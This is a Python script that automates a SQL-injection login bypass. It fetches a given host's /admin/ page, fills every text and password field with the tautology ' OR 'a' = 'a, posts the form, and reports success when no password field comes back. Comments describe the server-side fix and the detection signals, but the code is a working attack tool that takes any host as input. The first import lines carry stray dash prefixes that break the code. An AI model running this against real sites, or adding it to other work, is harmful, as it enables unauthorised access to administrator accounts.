- #!/usr/bin/python3
- import requests
- from bs4 import BeautifulSoup
- import sys
# Boolean-tautology string. A login handler that splices this into a SQL
# WHERE clause by string concatenation ends up with a condition that is
# always true; a handler that binds parameters treats it as a literal and
# the login simply fails. Parameterised queries are the fix on the server
# side, and "' OR '" inside a credential field is a direct WAF / query-log
# detection signal.
PSWD = "' OR 'a' = 'a"
#PSWD = '1'
def format_host(host: str) -> str:
    """Reduce a URL or host string to its bare ``host[:port]`` part.

    Surrounding whitespace is dropped, everything up to and including the
    first ``://`` is removed, and the result is cut at the first ``/``.
    The function is defined but not called anywhere in this file.
    """
    bare = host.strip()
    # partition() finds the first "://", matching the original find() scan.
    _, scheme_sep, after_scheme = bare.partition('://')
    if scheme_sep:
        bare = after_scheme
    # Keep only what precedes the first slash (the whole string if none).
    return bare.split('/', 1)[0]
def create_headers(host: str) -> dict[str, str]:
    """Return the fixed, browser-like request headers used for every request.

    ``host`` has a leading ``http://`` / ``https://`` stripped but is then
    unused, so the returned dict is identical for any input. The
    User-Agent impersonates a dated desktop Chrome 43 build, which makes it
    a convenient log signature for defenders watching admin paths.
    """
    # Same order as the original two checks: http:// first, then https://.
    for scheme in ('http://', 'https://'):
        if host.startswith(scheme):
            host = host[len(scheme):]
    user_agent = (
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
        '(KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36'
    )
    return {
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'en-US,en;q=0.8,ka;q=0.6',
        'Cache-Control': 'max-age=0',
        'Connection': 'keep-alive',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': user_agent,
        'Upgrade-Insecure-Requests': '1',
    }
def get_form(host):
    """Fetch ``<host>/admin/`` and return the largest ``<form>`` on the page.

    ``host`` is expected to already carry a scheme (``run`` prepends
    ``http://`` when none is present). The returned element is chosen by
    ``max(forms, key=len)`` (bs4's ``len(tag)`` counts the tag's contents);
    ``max`` raises ValueError when the page contains no form at all.

    The ``filtered`` list is populated but never read, so the POST-method
    check in the loop has no effect on the result.
    """
    url = host + '/admin/'
    s = requests.Session()
    # For defenders: a GET on /admin/ carrying the dated Chrome 43
    # User-Agent from create_headers is an easy request-log signature.
    resp = s.get(url, headers = create_headers(host))
    # print(resp.content)
    # No parser is named; recent bs4 versions pick one and emit a warning.
    soap = BeautifulSoup(resp.content)
    forms = soap.find_all('form');
    filtered = []
    for f in forms:
        # A page with a single form skips the method check entirely.
        if len(forms) == 1:
            break
        attr = f.attrs.get('method')
        if attr != 'post' and attr != 'POST':
            continue
        filtered.append(f)
    # Selection runs over `forms`, not `filtered`.
    form = max(forms, key=len)
    return form
def get_action(form) -> str:
    """Return the form's ``action`` attribute.

    When the attribute is missing or empty, two diagnostic lines
    (``get action`` / ``unknown``) are printed and the process exits with
    status 0 — the caller never sees a return value in that case.
    """
    action = form.attrs.get('action')
    if action:
        return action
    print('get action')
    print('unknown')
    exit(0)
def gen_user_data(form) -> dict:
    """Build the POST body for ``form`` from its ``<input>`` elements.

    Inputs without a ``name`` are skipped. Inputs that already carry a
    non-empty ``value`` (typically hidden fields and buttons) keep it.
    Remaining inputs whose ``type`` is absent, empty, ``text`` or
    ``password`` are set to ``PSWD``; any other type keeps its (possibly
    ``None``) value. Returns ``dict[str, str | None]``.
    """
    inputs = form.find_all('input')
    res = {}
    for inp in inputs:
        name = inp.attrs.get('name')
        if not name:
            continue
        val = inp.attrs.get('value')
        # Pre-filled values are preserved so the server still receives
        # whatever hidden fields it emitted.
        res[name] = val
        if val and len(val) > 0:
            continue
        tp = inp.attrs.get('type')
        if tp and len(tp) > 0 and tp != 'text' and tp != 'password':
            continue
        # Every credential-like field receives the same tautology string;
        # a handler that binds parameters treats it as a literal and the
        # login fails, which is the expected outcome on a patched target.
        res[name] = PSWD
    return res
def run(host: str) -> None:
    """Probe one host's admin login form with the tautology payload.

    Normalises ``host`` (strips a trailing ``/``; prepends ``http://`` when
    no scheme is present, i.e. plaintext transport by default), fetches the
    form via ``get_form``, POSTs the data built by ``gen_user_data`` to the
    form's action, and prints ``success`` when the response no longer
    contains a password input, ``failure`` otherwise.

    Side effects: two HTTP requests, several prints to stdout, and
    ``exit()`` when the POST returns a 4xx/5xx status. An empty ``host``
    raises IndexError on the first line.

    Server-side mitigation is parameterised queries plus lockout / rate
    limiting on the login endpoint; the detection signal is a POST to
    ``/admin/<action>`` whose credential fields contain ``' OR 'a' = 'a``.
    """
    if host[len(host) - 1] == '/':
        host = host[:-1]
    # find() anywhere in the string, not just at the start.
    if host.find('http://') == -1 and host.find('https://') == -1:
        host = 'http://' + host
    form = get_form(host);
    action = get_action(form)
    # print(form)
    # Result discarded here; the dict is rebuilt below.
    gen_user_data(form)
    # exit()
    # A relative action is appended to host + '/admin/'; an absolute one
    # replaces the whole URL.
    url = host + '/admin/' + action
    if action[0:7] == 'http://' or action[0:8] == 'https://':
        url = action
    s = requests.Session()
    login_url = url
    userdata = gen_user_data(form)
    headers = create_headers(host)
    res = s.post(login_url, data=userdata, headers=headers)
    if res.status_code >= 400:
        print('failure')
        exit()
    # print(res.content)
    # print(res.content)
    # print(res.cookies)
    # print(dir(res))
    # print(res.url)
    # print(res.status_code)
    # latin-1 maps every byte, so decoding cannot raise regardless of the
    # real charset of the response.
    content = res.content.decode('latin')
    # res.url is the final URL after any redirects.
    print(res.url)
    print(content)
    # Heuristic only: any response without a password input — including a
    # non-login page or an error page — is reported as success.
    if content.find('type="password"') != -1 or content.find("type='password'") != -1:
        print('failure')
    else:
        print('success')
if __name__ == '__main__':
    # Exactly one positional argument is expected: the host to probe.
    args = sys.argv[1:]
    if not args:
        print('Usage: %s host' % sys.argv[0])
        exit(0)
    run(args[0])